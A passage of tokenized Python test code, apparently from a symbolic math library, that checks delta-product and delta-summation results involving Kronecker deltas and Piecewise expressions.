** ( i - <NUM_LIT:1> ) * x * ( x * y ) ** ( k - i ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , k 
, <NUM_LIT:3> ) ) == ( x * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( <NUM_LIT:3> - i ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , k , l ) ) == ( x * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( l - i ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_x_add_y_kd ( ) : <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> + x * ( x * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + ( x * y ) * x * ( x * y ) * KD ( i , <NUM_LIT:2> ) + ( x * y ) ** <NUM_LIT:2> * x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * ( y + KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * ( y + KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * ( y + KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( x * y ) ** k + Piecewise ( <EOL> ( ( x * y ) ** ( i - <NUM_LIT:1> ) * x * ( x * y ) ** ( k - i ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( x * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( <NUM_LIT:3> - i ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , k , l ) ) == ( x * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( l - i ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_x_add_y_twokd ( ) : <EOL> assert dp ( x * ( y + 
<NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> + <NUM_LIT:2> * x * ( x * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + <NUM_LIT:2> * x * y * x * x * y * KD ( i , <NUM_LIT:2> ) + <NUM_LIT:2> * ( x * y ) ** <NUM_LIT:2> * x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * ( y + <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * ( y + <NUM_LIT:2> * KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * ( y + <NUM_LIT:2> * KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( x * y ) ** k + Piecewise ( <EOL> ( <NUM_LIT:2> * ( x * y ) ** ( i - <NUM_LIT:1> ) * x * ( x * y ) ** ( k - i ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( x * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( <NUM_LIT:2> * ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( <NUM_LIT:3> - i ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , l ) ) == ( x * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( <NUM_LIT:2> * ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( l - i ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_add_x_y_add_y_kd ( ) : <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( ( x + y ) * y ) ** <NUM_LIT:3> + ( x + y ) * ( ( x + y ) * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + ( x + y ) * y * ( x + y ) ** <NUM_LIT:2> * y * KD ( i , <NUM_LIT:2> ) + ( ( x + y ) * y ) ** <NUM_LIT:2> * ( x + y ) * KD ( i , <NUM_LIT:3> ) <EOL> assert 
dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + y ) * ( y + KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + y ) * ( y + KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + y ) * ( y + KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( ( x + y ) * y ) ** k + Piecewise ( <EOL> ( ( ( x + y ) * y ) ** ( i - <NUM_LIT:1> ) * ( x + y ) * ( ( x + y ) * y ) ** ( k - i ) , <EOL> And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( ( x + y ) * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( ( ( x + y ) * y ) ** ( i - k ) * ( x + y ) * ( ( x + y ) * y ) ** ( <NUM_LIT:3> - i ) , <EOL> And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == ( ( x + y ) * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( ( x + y ) * y ) ** ( i - k ) * ( x + y ) * ( ( x + y ) * y ) ** ( l - i ) , <EOL> And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_add_x_kd_add_y_kd ( ) : <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:1> ) * ( KD ( i , k ) + x ) * ( ( KD ( i , k ) + x ) * y ) ** <NUM_LIT:2> + KD ( i , <NUM_LIT:2> ) * ( KD ( i , k ) + x ) * y * ( KD ( i , k ) + x ) ** <NUM_LIT:2> * y + KD ( i , <NUM_LIT:3> ) * ( ( KD ( i , k ) + x ) * y ) ** <NUM_LIT:2> * ( KD ( i , k ) + x ) + ( ( KD ( i , k ) + x ) * y ) ** <NUM_LIT:3> <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + KD ( i , k ) ) * ( y + KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j 
) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + KD ( i , k ) ) * ( y + KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + KD ( i , k ) ) * ( y + KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( ( x + KD ( i , k ) ) * y ) ** k + Piecewise ( <EOL> ( ( ( x + KD ( i , k ) ) * y ) ** ( i - <NUM_LIT:1> ) * ( x + KD ( i , k ) ) * <EOL> ( ( x + KD ( i , k ) ) * y ) ** ( - i + k ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( ( x + KD ( i , k ) ) * y ) ** ( <NUM_LIT:4> - k ) + Piecewise ( <EOL> ( ( ( x + KD ( i , k ) ) * y ) ** ( i - k ) * ( x + KD ( i , k ) ) * <EOL> ( ( x + KD ( i , k ) ) * y ) ** ( - i + <NUM_LIT:3> ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == ( ( x + KD ( i , k ) ) * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( ( x + KD ( i , k ) ) * y ) ** ( i - k ) * ( x + KD ( i , k ) ) * <EOL> ( ( x + KD ( i , k ) ) * y ) ** ( - i + l ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltasummation_trivial ( ) : <EOL> assert ds ( x , ( j , <NUM_LIT:1> , <NUM_LIT:0> ) ) == <NUM_LIT:0> <EOL> assert ds ( x , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x <EOL> assert ds ( x + y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * ( x + y ) <EOL> assert ds ( x * y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x * y <EOL> assert ds ( KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * KD ( i , j ) <EOL> assert ds ( x * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x * KD ( i , j ) <EOL> assert ds ( x * y * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> 
* x * y * KD ( i , j ) <EOL> def test_deltasummation_basic_numerical ( ) : <EOL> n = symbols ( '<STR_LIT:n>' , integer = True , nonzero = True ) <EOL> assert ds ( KD ( n , <NUM_LIT:0> ) , ( n , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert ds ( KD ( i ** <NUM_LIT:2> , j ** <NUM_LIT:2> ) , ( j , - oo , oo ) ) == Sum ( KD ( i ** <NUM_LIT:2> , j ** <NUM_LIT:2> ) , ( j , - oo , oo ) ) <EOL> assert Piecewise ( ( KD ( i , k ) , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) == ds ( KD ( i , j ) * KD ( j , k ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ds ( KD ( j , k ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert ds ( KD ( i , k ) , ( k , - oo , oo ) ) == <NUM_LIT:1> <EOL> assert ds ( KD ( i , k ) , ( k , <NUM_LIT:0> , oo ) ) == Piecewise ( ( <NUM_LIT:1> , S ( <NUM_LIT:0> ) <= i ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( k * KD ( i , j ) * KD ( j , k ) , ( k , - oo , oo ) ) == j * KD ( i , j ) <EOL> assert ds ( j * KD ( i , j ) , ( j , - oo , oo ) ) == i <EOL> assert ds ( i * KD ( i , j ) , ( i , - oo , oo ) ) == j <EOL> assert ds ( x , ( i , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x <EOL> assert ds ( ( i + j ) * KD ( i , j ) , ( j , - oo , oo ) ) == <NUM_LIT:2> * i <EOL> def test_deltasummation_basic_symbolic ( ) : <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , 
( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , k , l ) ) == Piecewise ( ( <NUM_LIT:1> , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) <EOL> def test_deltasummation_mul_x_kd ( ) : <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , k , l ) ) == Piecewise ( ( x , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) <EOL> def test_deltasummation_mul_add_x_y_kd ( ) : <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x + y , Eq ( i , 
<NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x + y , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x + y , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( x + y , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , k , l ) ) == Piecewise ( ( x + y , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) <EOL> def test_deltasummation_add_kd_kd ( ) : <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , 
<NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_add_mul_x_kd_kd ( ) : <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:3> ) ) , ( 
<NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_mul_x_add_kd_kd ( ) : <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , 
Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_mul_add_x_y_add_kd_kd ( ) : <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> 
, <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( l <= i , i 